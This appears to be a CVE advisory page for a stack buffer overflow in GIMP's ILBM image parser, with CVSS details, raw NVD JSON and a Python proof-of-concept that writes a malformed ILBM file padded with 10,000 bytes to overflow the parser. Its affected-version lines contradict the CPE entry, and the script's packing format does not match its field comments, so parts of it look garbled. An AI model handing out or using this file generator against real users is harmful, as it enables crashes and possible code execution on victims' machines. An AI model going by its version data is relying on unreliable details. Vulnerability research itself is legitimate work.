Security Vulnerability Report
CVE-2025-10925 CVSS 7.8 HIGH

CVE-2025-10925

Published: 2025-10-29 20:15:35
Last Modified: 2025-11-04 13:14:02

Description

GIMP ILBM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ILBM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27793.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:* - VULNERABLE
GIMP < 2.10.36
GIMP < 2.99.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-10925 PoC - GIMP ILBM Stack Buffer Overflow
# Generate malicious ILBM file to trigger stack-based buffer overflow
import struct


def create_malicious_ilbm():
    # ILBM file header
    bmhd_chunk = b'BMHD'  # BitMap Header chunk type

    # Malicious BMHD data - crafted to overflow buffer
    # Standard BMHD is 20 bytes, but we provide excessive data
    width = 320
    height = 200
    bitplanes = 24

    # Create BMHD chunk with oversized data
    bmhd_data = struct.pack(
        '>HHBBHHHHBBHH',
        width,      # w - width
        height,     # h - height
        0,          # x - x position
        0,          # y - y position
        bitplanes,  # nplanes - number of planes
        0,          # masking
        0,          # compression
        0,          # transparent color
        0,          # x aspect
        0,          # y aspect
        width,      # page width
        height      # page height
    )

    # Add padding and overflow data
    overflow_payload = b'A' * 10000  # Large payload to overflow stack buffer
    bmhd_data += overflow_payload

    # Chunk size (including itself but not the size field)
    chunk_size = len(bmhd_data)

    # ILBM file structure
    ilbm_file = b'FORM'  # IFF container
    ilbm_file += struct.pack('>I', 8 + 8 + chunk_size)  # Total file size
    ilbm_file += b'ILBM'  # ILBM type
    ilbm_file += bmhd_chunk
    ilbm_file += struct.pack('>I', chunk_size)
    ilbm_file += bmhd_data
    return ilbm_file


if __name__ == '__main__':
    malicious_file = create_malicious_ilbm()
    # Output name matches the name reported in the message below
    with open('CVE-2025-10925_malicious.ilbm', 'wb') as f:
        f.write(malicious_file)
    print('[+] Malicious ILBM file created: CVE-2025-10925_malicious.ilbm')
    print('[+] This file triggers stack buffer overflow in GIMP ILBM parser')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10925", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:35.300", "lastModified": "2025-11-04T13:14:01.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GIMP ILBM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ILBM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27793."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "103D75C8-35B7-4E50-B75C-2D75294CB7AC"}]}]}], "references": [{"url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2450", "source": "[email protected]", "tags": ["Patch"]}, {"url": 
"https://www.zerodayinitiative.com/advisories/ZDI-25-914/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}